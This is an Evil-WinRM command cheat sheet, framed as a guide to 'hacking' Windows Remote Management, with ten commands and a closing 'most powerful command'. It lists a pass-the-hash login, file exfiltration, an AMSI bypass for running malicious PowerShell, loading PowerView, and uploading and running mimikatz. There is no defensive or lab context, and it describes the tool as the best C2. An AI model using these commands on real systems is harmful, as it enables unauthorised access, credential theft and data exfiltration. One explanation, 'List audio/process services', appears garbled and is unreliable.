Evil-WinRM Command Guide

Evil-WinRM is the ultimate shell for hacking Windows Remote Management (WinRM). It provides a PowerShell interface with built-in post-exploitation features.

Top 10 Useful Commands

1. Basic Connect

evil-winrm -i 10.10.10.10 -u user -p pass

Explanation: Standard login.

2. Pass The Hash

evil-winrm -i 10.10.10.10 -u user -H <NTLM_HASH>

Explanation: Login without a password if you have the hash.

3. Upload File

*Evil-WinRM* PS > upload /local/path/file.exe

Explanation: Built-in upload command (no certutil needed).

4. Download File

*Evil-WinRM* PS > download C:\Windows\System32\drivers\etc\hosts

Explanation: Exfiltrate data.

5. Load Scripts (Bypass AMSI)

*Evil-WinRM* PS > Bypass-4MSI

Explanation: Execute built-in AMSI bypass to run unsigned malicious powershell.

6. Menu (Features)

*Evil-WinRM* PS > menu

Explanation: Show loaded modules (Invoke-Binary, DllInjection, etc).

7. Load Powershell Script

evil-winrm -i ... -s /path/to/scripts/

Explanation: Load a directory of .ps1 scripts (like PowerView) at startup.

8. Execute Loaded Script

*Evil-WinRM* PS > Invoke-PowerView

Explanation: Run a script loaded via -s.

9. Service Mode

*Evil-WinRM* PS > services

Explanation: List audio/process services.

10. SSL

evil-winrm -i 10.10.10.10 -S

Explanation: Force SSL (valid for port 5986).

The Most Powerful Command

(Interactive):

upload /path/to/mimikatz.exe; ./mimikatz.exe

Explanation: Evil-WinRM makes file transfer and execution trivial, making it the best C2 for WinRM.